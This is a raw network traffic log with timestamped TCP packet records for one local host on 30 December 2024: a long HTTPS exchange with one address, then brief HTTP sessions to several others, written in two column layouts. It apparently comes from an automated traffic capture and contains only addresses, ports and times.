Dec 30, 2024 10:57:07.957065105 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.957101107 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.957112074 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.957117081 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.957165003 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.957173109 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.957252026 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.957283974 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.957290888 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.957298994 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.957334995 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.962201118 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.962258101 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.962291002 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.962301016 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.962306023 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.962337971 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.962342024 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.967344999 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.967386007 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.967391014 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.967474937 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.967509031 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.967514038 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.967546940 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.967583895 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.967587948 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.972198963 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.972232103 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.972248077 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.972254038 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.972294092 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.972304106 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.972307920 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.972347975 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.972351074 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.972357035 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.972393990 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.976569891 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.976679087 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.976703882 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.976722956 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.976730108 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.976774931 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.977057934 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.980659008 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.980693102 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.980698109 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.980707884 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.980750084 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.980751991 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.980757952 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.980808973 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.980814934 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.984358072 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.984411955 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.984416962 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.984587908 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.984637022 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.984641075 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.984690905 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.984725952 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.984730959 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.988765001 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.988801956 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.988811016 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.988826990 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.988861084 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.988882065 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.988889933 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.988925934 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.988961935 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.992480040 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.992527962 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.992533922 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.992701054 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.992732048 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.992739916 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.992746115 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.992789984 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.992993116 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.998687983 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.998723984 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.998739004 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.998744011 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.998794079 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.998794079 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.998805046 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:07.998835087 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:07.998840094 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.008862972 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.008897066 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.008908987 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.008913994 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.008958101 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.009047031 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.009105921 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.009278059 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.009284019 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.014462948 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.014496088 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.014507055 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.014512062 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.014542103 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.014563084 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.014566898 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.014625072 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.014630079 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.020205021 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.020237923 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.020261049 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.020266056 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.020304918 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.020308971 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.020313978 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.020353079 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.020356894 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.025634050 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.025671005 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.025698900 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.025703907 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.025737047 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.025744915 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.025749922 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.025806904 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.025810957 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.031164885 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.031203032 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.031204939 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.031212091 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.031254053 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.031259060 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.031285048 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.031343937 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.031347990 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.036509991 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.036537886 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.036556005 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.036561012 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.036603928 CET | 49711 | 443 | 192.168.2.6 | 172.217.16.193
Dec 30, 2024 10:57:08.036604881 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
Dec 30, 2024 10:57:08.036613941 CET | 443 | 49711 | 172.217.16.193 | 192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.036652088 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.036655903 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039856911 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039882898 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039902925 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.039907932 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039951086 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.039963961 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.039968014 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.040004969 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.040355921 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.044776917 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.044800997 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.044820070 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.044826031 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.044879913 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.044998884 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.045042992 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.045080900 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.045085907 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.049938917 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.049982071 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.049987078 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.050097942 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.050128937 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.050152063 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.050160885 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.050205946 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.054790020 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055006981 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055039883 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055047989 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.055052042 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055089951 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055095911 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.055099964 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.055131912 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.055136919 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059328079 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059361935 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059372902 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.059377909 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059415102 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059426069 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.059429884 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.059472084 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.063206911 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.063270092 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.063303947 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.063308954 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.063318968 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.063354969 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.063360929 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067079067 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067111015 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067127943 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.067132950 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067183018 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.067188025 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067321062 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067351103 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067363024 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.067367077 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.067414999 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.071408033 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.071460962 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.071491957 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.071502924 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.071506977 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.071546078 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.071549892 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075237989 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075269938 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075275898 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.075279951 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075323105 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075324059 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.075330973 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.075371981 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.075376034 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081417084 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081453085 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081460953 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.081465006 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081506014 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081511974 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.081516027 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081557989 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081559896 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.081566095 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.081600904 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091496944 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091633081 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091658115 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091691017 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091696024 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091741085 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091782093 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091846943 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091887951 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091932058 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091948032 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:57:08.091960907 CET49711443192.168.2.6172.217.16.193
                                                                                                  Dec 30, 2024 10:57:08.091965914 CET44349711172.217.16.193192.168.2.6
                                                                                                  Dec 30, 2024 10:58:26.935838938 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:26.940645933 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:26.940717936 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:26.952094078 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:26.956854105 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534137011 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534163952 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534174919 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534251928 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:27.534284115 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:27.534313917 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:27.539817095 CET4998780192.168.2.6188.114.97.3
                                                                                                  Dec 30, 2024 10:58:27.544663906 CET8049987188.114.97.3192.168.2.6
                                                                                                  Dec 30, 2024 10:58:42.903278112 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:42.908164024 CET804998852.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:42.908236027 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:42.920346975 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:42.925101995 CET804998852.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:43.355765104 CET804998852.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:43.355808973 CET804998852.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:43.355868101 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:44.427251101 CET4998880192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:45.445389986 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:45.450258970 CET804998952.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:45.450354099 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:45.465023994 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:45.469854116 CET804998952.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:45.893651962 CET804998952.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:45.893845081 CET804998952.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:45.893955946 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:46.974056005 CET4998980192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:47.992618084 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:47.997415066 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:47.997576952 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:48.012761116 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:48.017611027 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:48.017751932 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:48.451124907 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:48.451328039 CET804999052.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:48.451399088 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:49.520940065 CET4999080192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.539694071 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.544605970 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:50.544739962 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.554193974 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.558973074 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:50.985822916 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:50.985945940 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:50.986007929 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.988922119 CET4999180192.168.2.652.223.13.41
                                                                                                  Dec 30, 2024 10:58:50.993762970 CET804999152.223.13.41192.168.2.6
                                                                                                  Dec 30, 2024 10:58:56.330504894 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:56.335383892 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:56.335484028 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:56.347444057 CET4999380192.168.2.6108.179.193.23
                                                                                                  Dec 30, 2024 10:58:56.352276087 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038362026 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038372993 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038383007 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038423061 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038433075 CET8049993108.179.193.23192.168.2.6
